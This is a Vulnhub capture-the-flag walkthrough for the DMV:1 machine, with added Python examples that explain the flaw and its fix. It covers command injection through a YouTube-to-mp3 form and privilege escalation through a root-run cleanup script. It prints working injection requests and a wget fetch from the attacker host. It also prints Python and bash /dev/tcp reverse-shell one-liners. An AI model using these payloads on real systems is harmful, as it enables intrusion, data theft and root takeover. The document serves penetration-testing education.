
In this Vulnhub walkthrough you will learn how to complete the DMV:1 challenge. I have not figured out the significance of the name yet. There is usually a relation between the name of a box and something in or about it.

DMV: 1 Vulnhub Walkthrough
MACHINE NAME: DMV: 1
LOCATION: https://www.vulnhub.com/entry/dmv-1,462/
AUTHOR: https://www.vulnhub.com/author/jonathan,684/
DIFFICULTY: easy

Discovery Enumeration

Nmap finds two open ports: ssh (22) and http (80).

Host is up (0.0032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Brute forcing ssh

Since ssh is running I try to brute force a login with hydra, but it does not work.

Web Enumeration

Viewing the website, it looks like a service for converting YouTube videos to mp3 files.

To learn more about the software behind it I submit a test id and watch the server's response in Burp Suite.

Exploit Using Burp Suite

Error messages from the server are a great way to discover vulnerabilities: they reveal what software is actually handling the request. The wording of this response points directly at the GitHub repo the site is built on.

According to that project's documentation you can use --exec to run a command after a download. That option is only the carrier here; the real problem is that the site drops the submitted value straight into a shell command line, so a backtick command substitution inside the value runs before the downloader ever does. ${IFS} is used in place of a literal space; the shell expands it to whitespace when it splits the substituted command into words. The %3c (a URL-encoded <) makes the shell redirect stdin from a file named after the command's output, which is why that output shows up in the error message. The value therefore takes the form --exec%3c`command${IFS}args` and gives code execution on the remote server.

Here is the complete request from Burp to the server.

POST / HTTP/1.1
Host: 192.168.1.78
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.78/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
yt_url=--exec%3c`cat${IFS}/etc/passwd`

And the response indicates that we have arbitrary code execution. This is good!

HTTP/1.1 200 OK
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1900
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":2,"errors":"sh: 1: cannot open root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndmv:x:1000:1000:dmv:\/home\/dmv:\/bin\/bash: No such file\n","url_orginal":"--exec<`cat${IFS}\/etc\/passwd`","output":"","result_url":"\/tmp\/downloads\/5f5c283b3b9fe.mp3"}
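To make the mechanism behind that response concrete, here is an added example (my code, not the walkthrough's and not the challenge's own web app) that models the vulnerable pattern beside a hardened version. It assumes the site shelled out to youtube-dl with the form value pasted into the command string; the downloader is stubbed with /bin/echo so it runs offline, and the host allow-list is an assumption.

```python
"""Why the DMV:1 payload works and what the fix looks like.

Added example, not code from the walkthrough or from the challenge's own web
app. The downloader is stubbed with /bin/echo so everything runs offline; the
assumption is that the real site shelled out to youtube-dl in the same way."""
import subprocess
from urllib.parse import urlparse

DOWNLOADER = "echo"  # stand-in for youtube-dl (assumption for the demo)
ALLOWED_HOSTS = {"www.youtube.com", "youtube.com", "youtu.be"}  # assumed allow-list


def convert_vulnerable(yt_url: str) -> str:
    """The bug: the form value is glued into one command string that /bin/sh
    parses. Backticks are command substitution, and ${IFS} expands to
    whitespace, so `cat${IFS}/etc/passwd` runs before the downloader does."""
    cmd = f"{DOWNLOADER} {yt_url}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=10)
    return (proc.stdout + proc.stderr).strip()


def is_allowed_video_url(yt_url: str) -> bool:
    """Allow-list check: an http(s) URL on a known host, never something that
    looks like an option (-x, --exec ...) for the downloader."""
    if yt_url.startswith("-"):
        return False
    parts = urlparse(yt_url)
    return parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS


def run_argv(argv: list) -> str:
    """No shell involved: the list goes straight to execve, so backticks,
    $IFS and ; are just bytes inside one argument."""
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return (proc.stdout + proc.stderr).strip()


def convert_hardened(yt_url: str) -> str:
    """Validate first, then pass the value as a single argument after '--' so
    the downloader cannot interpret it as an option either."""
    if not is_allowed_video_url(yt_url):
        raise ValueError("rejected: not an allow-listed video URL")
    # /bin/echo prints its arguments verbatim, '--' included; a real
    # youtube-dl stops option parsing at '--' and treats the rest as the URL.
    return run_argv([DOWNLOADER, "--", yt_url])


if __name__ == "__main__":
    payload = "`echo${IFS}pwned`"  # same trick as the page's cat${IFS}/etc/passwd
    print("vulnerable :", convert_vulnerable(payload))            # substitution ran
    print("no shell   :", run_argv([DOWNLOADER, "--", payload]))  # literal bytes
    try:
        convert_hardened(payload)
    except ValueError as err:
        print("hardened   :", err)
```

Run it and the vulnerable path prints just "pwned": the shell evaluated the backticks before the stub ever saw its argument. The argv path prints the payload back byte for byte, and the validated path refuses it outright. The `--` matters independently of the allow-list, because a value such as `--exec` reaching youtube-dl as an option is a second, separate way to run commands.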

To turn this into a shell I stage a reverse shell one-liner (Python, which is present on the target) that connects back to Kali Linux.

Put this in uploadme.sh

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now how to get it to the target? Start a simple Python webserver or Apache and serve it up.

Use this in your request.

yt_url=--exec%3c`wget${IFS}http://192.168.1.77:8000/uploadme.sh`

If you are not getting any hits to your webserver then check the details of the command going to the target from Burp.

kali@kali:~$ python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.78 - - [11/Sep/2020 22:01:21] "GET /uploadme.sh HTTP/1.1" 200 -

Now to execute the exploit finally use this in your request.

yt_url=--exec%3c`bash${IFS}uploadme.sh`

Before sending that request, start a netcat listener on the port you gave the one-liner, in my case nc -lvp 4444. The shell connects back to it.

Linux Privilege Escalation

Upon getting a reverse shell back I first upgrade my shell to a proper tty with: python -c 'import pty; pty.spawn("/bin/bash")'

Immediately it looks like there is an interesting file in the same directory, clean.sh.

The file is owned by www-data, the user our shell runs as, and we can write to it. A cleanup script sitting inside the web application's directory is most likely run on a schedule by a more privileged user, probably root, so whatever we put in it should end up being executed as root.

-rw-r--r-- 1 www-data www-data 17 Apr 12 05:07 clean.sh

Since we own the file we can overwrite its contents, even though its mode does not let us execute it ourselves (we do not need to; whatever invokes it will). Put this in the file:

bash -i >& /dev/tcp/192.168.1.77/1234 0>&1
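"Probably executed as root" is a guess until you check what actually runs the script. The added example below (my code, not from the walkthrough) parses system crontab text and reports entries that run as another user and name a file the current process can write. The page does not show how clean.sh is scheduled, so SAMPLE_CRONTAB is constructed and the path /var/www/html/clean.sh in it is hypothetical; run it on the box and it reads the real /etc/crontab and /etc/cron.d instead.

```python
"""Confirm that something privileged runs the script before overwriting it.

Added example, not code from the walkthrough. SAMPLE_CRONTAB is constructed
for the demo and /var/www/html/clean.sh is a hypothetical path."""
import glob
import os
import pwd
import shlex

SAMPLE_CRONTAB = """\
# constructed example in /etc/crontab format: m h dom mon dow user command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/1 * * * * root /bin/bash /var/www/html/clean.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot www-data /var/www/html/start.sh
"""


def parse_system_crontab(text: str):
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d text.
    Comments, blank lines and VAR=value assignments are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:
            continue
        if line.startswith("@"):                # @reboot user command
            fields = line.split(None, 2)
            if len(fields) == 3:
                entries.append((fields[1], fields[2]))
        else:                                   # m h dom mon dow user command
            fields = line.split(None, 6)
            if len(fields) == 7:
                entries.append((fields[5], fields[6]))
    return entries


def paths_in_command(command: str):
    """Absolute paths mentioned in a cron command, e.g. the script handed to
    bash. Relative names (run-parts, cd) are ignored."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def writable_cron_targets(crontab_text: str, me: str = None):
    """Entries that run as someone other than `me` and reference a file the
    current process can write: each is a clean.sh-style escalation candidate."""
    me = me or pwd.getpwuid(os.getuid()).pw_name
    hits = []
    for user, command in parse_system_crontab(crontab_text):
        if user == me:
            continue
        for path in paths_in_command(command):
            if os.path.isfile(path) and os.access(path, os.W_OK):
                hits.append((user, path, command))
    return hits


def system_crontab_text() -> str:
    """Concatenate the scheduler files a low-privilege user can usually read."""
    chunks = []
    for fn in ["/etc/crontab"] + sorted(glob.glob("/etc/cron.d/*")):
        try:
            with open(fn) as fh:
                chunks.append(fh.read())
        except OSError:
            pass  # unreadable or missing: nothing to report
    return "\n".join(chunks)


if __name__ == "__main__":
    for user, path, command in writable_cron_targets(system_crontab_text()):
        print(f"runs as {user}, writable by us: {path}   ({command})")
    print("sample entries parsed:", parse_system_crontab(SAMPLE_CRONTAB))
```

If nothing is reported, the script may still be started some other way (a user crontab you cannot read, a systemd timer, or a process loop), and a tool such as pspy that watches process creation is the next check; but a hit here is the evidence that makes the overwrite below a sure thing rather than a hope.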

Root Flag

Start a netcat listener once again and get a root shell back.


Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.

